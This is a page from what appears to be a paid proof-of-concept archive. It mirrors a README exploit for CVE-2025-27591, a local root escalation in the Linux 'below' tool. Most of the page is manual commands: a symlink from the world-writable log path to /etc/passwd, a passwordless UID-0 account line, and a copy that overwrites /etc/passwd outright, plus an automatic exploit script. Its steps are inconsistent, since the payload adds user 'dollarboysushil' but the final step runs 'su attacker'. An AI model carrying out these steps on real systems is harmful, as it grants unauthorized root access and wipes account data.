Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1110 CNY

100%
Buy Us a Coffee

CVE-2025-27591 PoC — below 安全漏洞

Source
https://github.com/dollarboysushil/Linux-Privilege-Escalation-CVE-2025-27591
Associated Vulnerability
Title:below 安全漏洞 (CVE-2025-27591)
Description:A privilege escalation vulnerability existed in the Below service prior to v0.9.0 due to the creation of a world-writable directory at /var/log/below. This could have allowed local unprivileged users to escalate to root privileges through symlink attacks that manipulate files such as /etc/shadow.
Description
CVE-2025-27591 is a known privilege escalation vulnerability in the Below service (version < v0.9.0)
Readme
# CVE-2025-27591 - Privilege Escalation via Writable Symlink in `below`

## Summary

This is a simple exploit for **CVE-2025-27591**, a local privilege escalation vulnerability in the `below` Linux system monitoring tool. The vulnerability affects versions prior to v0.9.0 and stems from incorrect permission assignments in the system. The issue was discovered in January 2025 and publicly disclosed on March 12, 2025 (SecurityOnline, OpenWall). When `below` is run with `sudo`, it may log errors into a world-writable directory (`/var/log/below`), allowing attackers to symlink a log file to sensitive targets like `/etc/passwd`.

By exploiting this, an unprivileged user with `sudo` access to `below` can escalate privileges to root.

---

## Vulnerability Details

- **CVE ID**: CVE-2025-27591
- **Vulnerable Tool**: `below`
- **Affected Feature**: Logging via `below record`
- **Vulnerable Path**: `/var/log/below/error_root.log`
- **Attack Prerequisites**:
  - The directory `/var/log/below` is world-writable
  - The attacker can run `sudo /usr/bin/below record` without a password

---

# Exploit Steps (Manual)

✅ Step 1: Verify world-writable log directory
You should see:

```bash
drwxrwxrwx 2 root root 4096 ... /var/log/below
```

![alt text](/Images/image.png)

✅ Step 2: Remove any existing `error_root.log`

```bash
rm -f /var/log/below/error_root.log
```

✅ Step 3: Create a symlink to /etc/passwd

```bash
ln -s /etc/passwd /var/log/below/error_root.log
```

then check using

```bash
ls -la /var/log/below/error_root.log
# should show: error_root.log -> /etc/passwd
```

![alt text](/Images/image2.png)

✅ Step 4: Create a payload file
This will add a new root user attacker with no password:

```bash
echo 'dollarboysushil::0:0:dollarboysusil:/root:/bin/bash' > /tmp/payload
```

file structure

```bash
username:password:UID:GID:comment(home/full name):home_directory:shell
```

key thing here is, UID and GUID
we are setting UID and GUID to 0 making it user a root user and Group ID = root group
![alt text](/Images/image3.png)

✅ Step 5: Trigger log write as root
This is the core of the exploit.

```bash
sudo /usr/bin/below record
```

This command is expected to fail or timeout — but it will try to write error logs to /var/log/below/error_root.log, which is actually /etc/passwd.
💡 In some cases, this alone may corrupt /etc/passwd — so we overwrite it fully next.

✅ Step 6: Overwrite /etc/passwd via symlink

```bash
cp /tmp/payload /var/log/below/error_root.log
```

![alt text](/Images/image4.png)

✅ Step 7: Become root

```bash
su attacker
```

You'll drop into a root shell, no password needed.
![alt text](/Images/image5.png)

# Exploit Steps (Automatic)

```bash
python3 dbs_exploit.py
```

![alt text](/Images/image6.png)
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →